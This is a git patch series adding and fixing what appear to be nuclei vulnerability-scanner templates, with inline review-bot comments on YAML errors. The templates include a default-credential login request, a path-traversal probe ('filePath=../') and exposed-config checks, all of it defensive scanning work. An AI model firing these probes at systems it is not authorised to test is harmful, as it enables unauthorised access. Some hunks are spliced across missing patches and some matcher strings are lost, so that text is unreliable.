From b32eac85b177d49cbe7c7a2c6b8e00b99610c720 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 25 May 2021 14:35:41 +0300 Subject: [PATCH 001/144] Give description --- vulnerabilities/other/kafdrop-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index 4f1d87554f..e7061938bd 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: medium tags: kafdrop,xss + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. reference: https://github.com/HomeAdvisor/Kafdrop/issues/12 requests: From 6af263bb306ce2c18ea19715abab704f88f21491 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 03:34:10 +0530 Subject: [PATCH 002/144] Matcher update --- takeovers/bitbucket-takeover.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/takeovers/bitbucket-takeover.yaml b/takeovers/bitbucket-takeover.yaml index 92d3177cae..f37cb4a198 100644 --- a/takeovers/bitbucket-takeover.yaml +++ b/takeovers/bitbucket-takeover.yaml @@ -12,8 +12,13 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - The page you have requested does not exist - - Repository not found \ No newline at end of file + - Repository not found + part: body + + words: + - text/plain + part: header \ No newline at end of file From 2a8605e777c40a1c9e8992715491c2c044e6cb54 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 03:35:34 +0530 Subject: [PATCH 003/144] Update bitbucket-takeover.yaml --- takeovers/bitbucket-takeover.yaml | 1 + 1 file changed, 1 insertion(+) 
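Review bot: On the new side of the bitbucket-takeover hunk, the `words:`/`part: header` pair after the blank line has no `- type: word` item of its own, so it lands in the same mapping as the first matcher and `words` and `part` become duplicate keys. Depending on the loader that is either a parse error or a silent last-wins, in which case the body check for `Repository not found` disappears and only the `text/plain` header check remains under `matchers-condition: and`. The follow-up in PATCH 003 adds the missing `- type: word`, so the two commits are best read together. The file also still ends without a trailing newline (`\ No newline at end of file`), which yamllint's new-line-at-end-of-file rule flags.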
diff --git a/takeovers/bitbucket-takeover.yaml b/takeovers/bitbucket-takeover.yaml index f37cb4a198..98ea79e80a 100644 --- a/takeovers/bitbucket-takeover.yaml +++ b/takeovers/bitbucket-takeover.yaml @@ -19,6 +19,7 @@ requests: - Repository not found part: body + - type: word words: - text/plain part: header \ No newline at end of file From 4bd6703ba87c552db785b0221a94c4aad9191c5e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 02:12:24 +0000 Subject: [PATCH 004/144] Create szhe-default-password.yaml --- .../szhe/szhe-default-password.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 default-logins/szhe/szhe-default-password.yaml diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml new file mode 100644 index 0000000000..f0e26e28c9 --- /dev/null +++ b/default-logins/szhe/szhe-default-password.yaml @@ -0,0 +1,33 @@ +id: szhe-default-password + +info: + name: Szhe Default Password + author: pikpikcu + severity: low + tags: szhe,dlogin +# vendor: https://github.com/Cl0udG0d/SZhe_Scan + +requests: + - method: POST + path: + - "{{BaseURL}}/login/" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + email=springbird%40qq.com&password=springbird&remeber=true + + matchers-condition: and + matchers: + + - type: word + words: + - '' + + - type: word + words: + - 'Set-Cookie' + part: header + + - type: status + status: + - 302 From 36c45cfbc91df9bc2166cf725b3ac658682a34ae Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 02:21:40 +0000 Subject: [PATCH 005/144] Create hikvision-info-leak.yaml --- exposures/configs/hikvision-info-leak.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/configs/hikvision-info-leak.yaml 
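Review bot: The first word matcher in szhe-default-password.yaml renders here as `- ''`; if that is literal (rather than an HTML tag lost in extraction), an empty string is contained in every response, so under `matchers-condition: and` the effective check is just a `Set-Cookie` header plus a 302, which many applications also return on a failed login. A token that only a successful login produces would make the default-credential claim testable. Also `body: |` keeps a trailing newline, so the POST body is sent as `...remeber=true` followed by `\n`; `body: |-` sends exactly the form string. The `# vendor:` comment sits between `tags:` and `requests:`; if it is a vendor reference it belongs as a `reference:` entry under `info`, where the other templates in this series keep theirs.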
diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml new file mode 100644 index 0000000000..90850aa0f0 --- /dev/null +++ b/exposures/configs/hikvision-info-leak.yaml @@ -0,0 +1,19 @@ +id: hikvision-info-leak + +info: + name: Hikvision Info Leak + author: pikpikcu + severity: medium + tags: exposure,config + +requests: + - method: GET + path: + - '{{BaseURL}}//config/user.xml' + + matchers: + - type: word + words: + - '' + - 'You should be redirected automatically to target URL: /' - type: word words: - - 'Set-Cookie' + - 'Set-Cookie: session' part: header - type: status From a716d7588853c468c50aeeb765f6ac6075a6c592 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 05:40:54 +0000 Subject: [PATCH 010/144] Auto Update README [Mon May 31 05:40:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7dc4de54e4..4343e30ff4 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 170 | exposed-panels | 137 | | takeovers | 67 | exposures | 104 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 28 | exposed-tokens | 0 | dns | 8 | +| default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**108 directories, 1168 files**. +**109 directories, 1169 files**. From 97195bf33c1d0ebf2e73c644777515621377e370 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 05:45:01 +0000 Subject: [PATCH 011/144] Create hjtcloud-information-disclosure.yaml --- .../hjtcloud-information-disclosure.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/hjtcloud-information-disclosure.yaml 
diff --git a/exposures/configs/hjtcloud-information-disclosure.yaml b/exposures/configs/hjtcloud-information-disclosure.yaml new file mode 100644 index 0000000000..2cb19bf1f5 --- /dev/null +++ b/exposures/configs/hjtcloud-information-disclosure.yaml @@ -0,0 +1,25 @@ +id: hjtcloud-information-disclosure + +info: + name: HJTcloud Information Disclosure + author: pikpikcu + severity: low + reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + tags: hjtcloud,exposure,config + + +requests: + - method: GET + path: + - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../" + + matchers-condition: and + matchers: + + - type: word + words: + - "/var/logs/../logs/" + + - type: status + status: + - 200 From 670b488bfe558739df7d7b98ac53e4a79ae72c20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:17:26 +0530 Subject: [PATCH 012/144] more strict matcher --- exposures/configs/hikvision-info-leak.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/configs/hikvision-info-leak.yaml b/exposures/configs/hikvision-info-leak.yaml index 90850aa0f0..c9c6095b67 100644 --- a/exposures/configs/hikvision-info-leak.yaml +++ b/exposures/configs/hikvision-info-leak.yaml @@ -9,11 +9,17 @@ info: requests: - method: GET path: - - '{{BaseURL}}//config/user.xml' + - '{{BaseURL}}/config/user.xml' + matchers-condition: and matchers: - type: word words: - ' Date: Mon, 31 May 2021 14:05:54 +0800 Subject: [PATCH 016/144] Adds DNS-based Cloud WAF detect --- technologies/dns-based-waf-detect.yaml | 172 +++++++++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100644 technologies/dns-based-waf-detect.yaml diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml new file mode 100644 index 0000000000..0a343d3bc8 --- /dev/null +++ b/technologies/dns-based-waf-detect.yaml 
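Review bot: The request path `{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../` carries a double slash after the base URL, which not every server normalises to a single slash and which the rename in PATCH 036 drops, so it should be `{{BaseURL}}/him/api/...` from the start. The request is a path-traversal probe (`filePath=../`) against a log-listing API, which fits a traversal/lfi tag better than `exposure,config` (the later move to `vulnerabilities/other/` makes the same point). The single body word `/var/logs/../logs/` is a reasonable echo of the injected path, but a second token from the response envelope would make the 200-plus-one-word match harder to trip by accident. There are also two consecutive blank lines between `tags:` and `requests:`, which yamllint's empty-lines rule flags.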
@@ -0,0 +1,172 @@ +id: dns-based-waf-detect + +info: + name: DNS-based WAF Detection + author: lu4nx + severity: info + tags: waf,tech, cloud + +dns: + - name: "{{FQDN}}" + type: A + recursion: true + retries: 5 + class: inet + matchers: + - type: word + name: sanfor-shield + words: + - ".sangfordns.com" + + - type: word + name: 360panyun + words: + - ".360panyun.com" + + - type: word + name: baiduyun + words: + - ".yunjiasu-cdn.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.cn" + - ".cyudun.net" + + - type: word + name: knownsec + words: + - ".jiashule.com" + - ".jiasule.org" + + - type: word + name: huaweicloud + words: + - ".huaweicloudwaf.com" + + - type: word + name: xinliuyun + words: + - ".ngaagslb.cn" + + - type: word + name: chinacache + words: + - ".chinacache.net" + - ".ccgslb.net" + + - type: word + name: nscloudwaf + words: + - ".nscloudwaf.com" + + - type: word + name: wangsu + words: + - ".wsssec.com" + - ".lxdns.com" + - ".wscdns.com" + - ".cdn20.com" + - ".cdn30.com" + - ".ourplat.net" + - ".wsdvs.com" + - ".wsglb0.com" + - ".wswebcdn.com" + - ".wswebpic.com" + - ".wsssec.com" + - ".wscloudcdn.com" + - ".mwcloudcdn.com" + + - type: word + name: qianxin + words: + - ".360safedns.com" + - ".360cloudwaf.com" + + - type: word + name: baiduyunjiasu + words: + - ".yunjiasu-cdn.net" + + - type: word + name: anquanbao + words: + - ".anquanbao.net" + + - type: regex + name: aliyun + regex: + - '\.w\.kunlun\w{2,3}\.com' + + - type: regex + name: aliyun-waf + regex: + - '\.aliyunddos\d+\.com' + - '\.aliyunwaf\.com' + - '\.aligaofang\.com' + - '\.aliyundunwaf\.com' + + - type: word + name: xuanwudun + words: + - ".saaswaf.com" + - ".dbappwaf.cn" + + - type: word + name: yundun + words: + - ".hwwsdns.cn" + - ".yunduncname.com" + +dns: + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + matchers: + - type: word + name: knownsec + words: + - ".jiasule.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.net" 
+ + - type: word + name: qianxin + words: + - ".360wzb.com" + + - type: word + name: anquanbao + words: + - ".anquanbao.com" + + - type: word + name: wangsu + words: + - ".chinanetcenter.com" + + - type: word + name: baiduyunjiasue + words: + - ".ns.yunjiasu.com" + + - type: word + name: chinacache + words: + - ".chinacache.com" + + - type: word + name: cloudflare + words: + - "ns.cloudflare.com" + + - type: word + name: edns + words: + - ".iidns.com" From 51d2385d07d7a5c8c3d3351658940b20e36c22d3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:07:40 +0000 Subject: [PATCH 017/144] Auto Update README [Mon May 31 06:07:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a99bbb1ecc..cd2761a086 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 137 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1170 files**. +**109 directories, 1171 files**. From 95248409e1031b33ee075d000cf4d280f6ac7bc1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:46:27 +0530 Subject: [PATCH 018/144] Added servicedesk-login-panel --- exposed-panels/servicedesk-login-panel.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/servicedesk-login-panel.yaml 
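Review bot: The new technologies/dns-based-waf-detect.yaml defines `dns:` twice at the top level (once for the A lookup, once for the NS lookup); a YAML mapping cannot hold the same key twice, so a strict loader rejects the file and a lenient one keeps only the second block, dropping the A request and every matcher under it. PATCH 023 merges the two blocks, so that part is a note for the record, but the lists carry smaller defects that survive into PATCH 023 and the copy in PATCH 026: `.wsssec.com` appears twice in `wangsu`, `.yunjiasu-cdn.net` is listed under both `baiduyun` and `baiduyunjiasu`, the NS matcher name `baiduyunjiasue` looks like a typo for `baiduyunjiasu`, and `ns.cloudflare.com` is the only entry without a leading dot. `tags: waf,tech, cloud` also has a space after the second comma, which leaves a ` cloud` tag with a leading space if the consumer splits on commas alone.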
diff --git a/exposed-panels/servicedesk-login-panel.yaml b/exposed-panels/servicedesk-login-panel.yaml new file mode 100644 index 0000000000..fa86dad366 --- /dev/null +++ b/exposed-panels/servicedesk-login-panel.yaml @@ -0,0 +1,23 @@ +id: servicedesk-login-panel + +info: + name: Servicedesk Login Panel Detector + author: aashiq + severity: info + description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + tags: servicedesk,confluence,jira,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/servicedesk/customer/user/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "https://confluence.atlassian.com" From d7afa45da42a834b203db152390516a5a8481a56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:24:05 +0000 Subject: [PATCH 019/144] Auto Update README [Mon May 31 06:24:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cd2761a086..4fa565e818 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 137 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 138 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1171 files**. +**109 directories, 1172 files**. From 920694cd22b09416dbe92fbf106fdfe687da8690 Mon Sep 17 00:00:00 2001 
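Review bot: The body check in servicedesk-login-panel.yaml accepts any 200 page at `/servicedesk/customer/user/login` that contains `https://confluence.atlassian.com`, a URL that Atlassian products in general put in help and footer links, so a Jira or Confluence instance serving a generic page at that path is reported as a Service Desk login panel. A string that only the customer-portal login page renders, added as a second `- type: word` under the existing `matchers-condition: and`, would make the `panel` claim specific; I cannot name that string from the hunk, so it needs confirming against a live portal.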
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 11:58:26 +0530 Subject: [PATCH 020/144] Added ems-login-panel --- exposed-panels/ems-login-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/ems-login-panel.yaml diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml new file mode 100644 index 0000000000..b93eb5bf4e --- /dev/null +++ b/exposed-panels/ems-login-panel.yaml @@ -0,0 +1,23 @@ + +id: ems-login-panel + +info: + name: EMS Login page detection + author: __Fazal + severity: info + tags: panel,ems + +requests: + - method: GET + path: + - '{{BaseURL}}/EMSWebClient/Login.aspx' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "EMS Web Client - Login" From 002168c1c4b021cef90b3958d1d6a3488b50d3d9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:00:16 +0530 Subject: [PATCH 021/144] Update ems-login-panel.yaml --- exposed-panels/ems-login-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/ems-login-panel.yaml b/exposed-panels/ems-login-panel.yaml index b93eb5bf4e..85879462c6 100644 --- a/exposed-panels/ems-login-panel.yaml +++ b/exposed-panels/ems-login-panel.yaml @@ -1,4 +1,3 @@ - id: ems-login-panel info: From f95bc62e25002275e88495530a074a099dd82fd0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:32:37 +0000 Subject: [PATCH 022/144] Auto Update README [Mon May 31 06:32:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4fa565e818..db55a48ec7 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 138 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1172 files**. +**109 directories, 1173 files**. From 833123bb1e90ba6851673c5a822dcbf5884e0b5b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:22:50 +0530 Subject: [PATCH 023/144] misc changes --- technologies/dns-based-waf-detect.yaml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml index 0a343d3bc8..34a905c833 100644 --- a/technologies/dns-based-waf-detect.yaml +++ b/technologies/dns-based-waf-detect.yaml @@ -4,14 +4,21 @@ info: name: DNS-based WAF Detection author: lu4nx severity: info - tags: waf,tech, cloud + tags: tech,waf,dns dns: - name: "{{FQDN}}" - type: A + type: CNAME recursion: true retries: 5 class: inet + + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + matchers: - type: word name: sanfor-shield @@ -119,15 +126,8 @@ dns: - ".hwwsdns.cn" - ".yunduncname.com" -dns: - - name: "{{FQDN}}" - type: NS - recursion: true - retries: 5 - class: inet - matchers: - type: word - name: knownsec + name: knownsec-ns words: - ".jiasule.net" From 9cd21c72b8f05fd0fbbe3579e7de37c918dcf0e9 Mon Sep 17 00:00:00 2001 
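Review bot: After the first hunk of PATCH 023 the context line `matchers:` is indented under the newly added NS request item, so the CNAME request has no matchers at all and the whole list, CNAME patterns such as `.sangfordns.com` included, is evaluated only against the NS answer; from the collapsed text the indentation cannot be confirmed, so check the rendered file, and confirm what nuclei does with a DNS request that has no matchers. The second hunk renames only `knownsec` to `knownsec-ns`, yet `chuangyudun`, `qianxin`, `anquanbao`, `wangsu` and `chinacache` now also appear twice in the single `matchers` list, which makes the reported matcher name ambiguous. The same layout and the same duplicate names are copied into `dns/dns-waf-detect.yaml` in PATCH 026. A structure that keeps each lookup with its own patterns is sketched below.
```yaml
dns:
  - name: "{{FQDN}}"
    type: CNAME
    recursion: true
    retries: 5
    class: inet
    matchers:
      # … unchanged: CNAME matchers, sanfor-shield through yundun …

  - name: "{{FQDN}}"
    type: NS
    recursion: true
    retries: 5
    class: inet
    matchers:
      # … unchanged: NS matchers, knownsec-ns through edns …
```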
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:28:19 +0530 Subject: [PATCH 024/144] Added exposed-vscode --- exposures/configs/exposed-vscode.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/configs/exposed-vscode.yaml diff --git a/exposures/configs/exposed-vscode.yaml b/exposures/configs/exposed-vscode.yaml new file mode 100644 index 0000000000..6bc6c6661d --- /dev/null +++ b/exposures/configs/exposed-vscode.yaml @@ -0,0 +1,18 @@ +id: exposed-vscode + +info: + name: Exposed VSCode Folders + author: aashiq + severity: low + description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body + tags: vscode,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.vscode/" + matchers: + - type: word + words: + - "Index of /.vscode" + part: body \ No newline at end of file From b6794ca7fb17ce8f4adffe7094ef133041459043 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 06:58:46 +0000 Subject: [PATCH 025/144] Auto Update README [Mon May 31 06:58:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index db55a48ec7..1a6adcd332 100644 --- a/README.md +++ b/README.md 
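Review bot: exposed-vscode.yaml ends without a trailing newline (`\ No newline at end of file` after `part: body`), which yamllint's new-line-at-end-of-file rule flags; PATCH 030 (`lancom-router-panel.yaml`) and PATCH 031 (`clave-login-panel.yaml`) have the same omission. The single word `Index of /.vscode` with no status matcher is acceptable because a directory-listing title is specific, but adding `- type: status` with `200` under `matchers-condition: and`, as the sibling panel templates do, would keep the exposure templates consistent.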
@@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | -| takeovers | 67 | exposures | 105 | technologies | 97 | +| takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 8 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1173 files**. +**109 directories, 1174 files**. From 1eaacde26df4c0e161de3f92a77dd212e0f9c655 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:34:09 +0530 Subject: [PATCH 026/144] misc fix --- dns/dns-waf-detect.yaml | 172 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 172 insertions(+) create mode 100644 dns/dns-waf-detect.yaml diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml new file mode 100644 index 0000000000..2c7870a1f1 --- /dev/null +++ b/dns/dns-waf-detect.yaml 
@@ -0,0 +1,172 @@ +id: dns-waf-detect + +info: + name: DNS WAF Detection + author: lu4nx + severity: info + tags: tech,waf,dns + +dns: + - name: "{{FQDN}}" + type: CNAME + recursion: true + retries: 5 + class: inet + + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + + matchers: + - type: word + name: sanfor-shield + words: + - ".sangfordns.com" + + - type: word + name: 360panyun + words: + - ".360panyun.com" + + - type: word + name: baiduyun + words: + - ".yunjiasu-cdn.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.cn" + - ".cyudun.net" + + - type: word + name: knownsec + words: + - ".jiashule.com" + - ".jiasule.org" + + - type: word + name: huaweicloud + words: + - ".huaweicloudwaf.com" + + - type: word + name: xinliuyun + words: + - ".ngaagslb.cn" + + - type: word + name: chinacache + words: + - ".chinacache.net" + - ".ccgslb.net" + + - type: word + name: nscloudwaf + words: + - ".nscloudwaf.com" + + - type: word + name: wangsu + words: + - ".wsssec.com" + - ".lxdns.com" + - ".wscdns.com" + - ".cdn20.com" + - ".cdn30.com" + - ".ourplat.net" + - ".wsdvs.com" + - ".wsglb0.com" + - ".wswebcdn.com" + - ".wswebpic.com" + - ".wsssec.com" + - ".wscloudcdn.com" + - ".mwcloudcdn.com" + + - type: word + name: qianxin + words: + - ".360safedns.com" + - ".360cloudwaf.com" + + - type: word + name: baiduyunjiasu + words: + - ".yunjiasu-cdn.net" + + - type: word + name: anquanbao + words: + - ".anquanbao.net" + + - type: regex + name: aliyun + regex: + - '\.w\.kunlun\w{2,3}\.com' + + - type: regex + name: aliyun-waf + regex: + - '\.aliyunddos\d+\.com' + - '\.aliyunwaf\.com' + - '\.aligaofang\.com' + - '\.aliyundunwaf\.com' + + - type: word + name: xuanwudun + words: + - ".saaswaf.com" + - ".dbappwaf.cn" + + - type: word + name: yundun + words: + - ".hwwsdns.cn" + - ".yunduncname.com" + + - type: word + name: knownsec-ns + words: + - ".jiasule.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.net" + + - type: word + 
name: qianxin + words: + - ".360wzb.com" + + - type: word + name: anquanbao + words: + - ".anquanbao.com" + + - type: word + name: wangsu + words: + - ".chinanetcenter.com" + + - type: word + name: baiduyunjiasue + words: + - ".ns.yunjiasu.com" + + - type: word + name: chinacache + words: + - ".chinacache.com" + + - type: word + name: cloudflare + words: + - "ns.cloudflare.com" + + - type: word + name: edns + words: + - ".iidns.com" From e0b970cf6f15388be532caaecb45570d08a22eff Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 12:44:26 +0530 Subject: [PATCH 027/144] removing duplicate --- technologies/dns-based-waf-detect.yaml | 172 ------------------------- 1 file changed, 172 deletions(-) delete mode 100644 technologies/dns-based-waf-detect.yaml diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml deleted file mode 100644 index 34a905c833..0000000000 --- a/technologies/dns-based-waf-detect.yaml +++ /dev/null 
@@ -1,172 +0,0 @@ -id: dns-based-waf-detect - -info: - name: DNS-based WAF Detection - author: lu4nx - severity: info - tags: tech,waf,dns - -dns: - - name: "{{FQDN}}" - type: CNAME - recursion: true - retries: 5 - class: inet - - - name: "{{FQDN}}" - type: NS - recursion: true - retries: 5 - class: inet - - matchers: - - type: word - name: sanfor-shield - words: - - ".sangfordns.com" - - - type: word - name: 360panyun - words: - - ".360panyun.com" - - - type: word - name: baiduyun - words: - - ".yunjiasu-cdn.net" - - - type: word - name: chuangyudun - words: - - ".365cyd.cn" - - ".cyudun.net" - - - type: word - name: knownsec - words: - - ".jiashule.com" - - ".jiasule.org" - - - type: word - name: huaweicloud - words: - - ".huaweicloudwaf.com" - - - type: word - name: xinliuyun - words: - - ".ngaagslb.cn" - - - type: word - name: chinacache - words: - - ".chinacache.net" - - ".ccgslb.net" - - - type: word - name: nscloudwaf - words: - - ".nscloudwaf.com" - - - type: word - name: wangsu - words: - - ".wsssec.com" - - ".lxdns.com" - - ".wscdns.com" - - ".cdn20.com" - - ".cdn30.com" - - ".ourplat.net" - - ".wsdvs.com" - - ".wsglb0.com" - - ".wswebcdn.com" - - ".wswebpic.com" - - ".wsssec.com" - - ".wscloudcdn.com" - - ".mwcloudcdn.com" - - - type: word - name: qianxin - words: - - ".360safedns.com" - - ".360cloudwaf.com" - - - type: word - name: baiduyunjiasu - words: - - ".yunjiasu-cdn.net" - - - type: word - name: anquanbao - words: - - ".anquanbao.net" - - - type: regex - name: aliyun - regex: - - '\.w\.kunlun\w{2,3}\.com' - - - type: regex - name: aliyun-waf - regex: - - '\.aliyunddos\d+\.com' - - '\.aliyunwaf\.com' - - '\.aligaofang\.com' - - '\.aliyundunwaf\.com' - - - type: word - name: xuanwudun - words: - - ".saaswaf.com" - - ".dbappwaf.cn" - - - type: word - name: yundun - words: - - ".hwwsdns.cn" - - ".yunduncname.com" - - - type: word - name: knownsec-ns - words: - - ".jiasule.net" - - - type: word - name: chuangyudun - words: - - ".365cyd.net" - - - 
type: word - name: qianxin - words: - - ".360wzb.com" - - - type: word - name: anquanbao - words: - - ".anquanbao.com" - - - type: word - name: wangsu - words: - - ".chinanetcenter.com" - - - type: word - name: baiduyunjiasue - words: - - ".ns.yunjiasu.com" - - - type: word - name: chinacache - words: - - ".chinacache.com" - - - type: word - name: cloudflare - words: - - "ns.cloudflare.com" - - - type: word - name: edns - words: - - ".iidns.com" From c6c139abe38caadf06b34d30b91fd2e2aac01580 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:17:35 +0000 Subject: [PATCH 028/144] Auto Update README [Mon May 31 07:17:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1a6adcd332..0cacc956a9 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 8 | +| default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1174 files**. +**109 directories, 1175 files**. From e89760c89ca9aa6620c4a75f29bfbf4fa9486def Mon Sep 17 00:00:00 2001 From: lulz 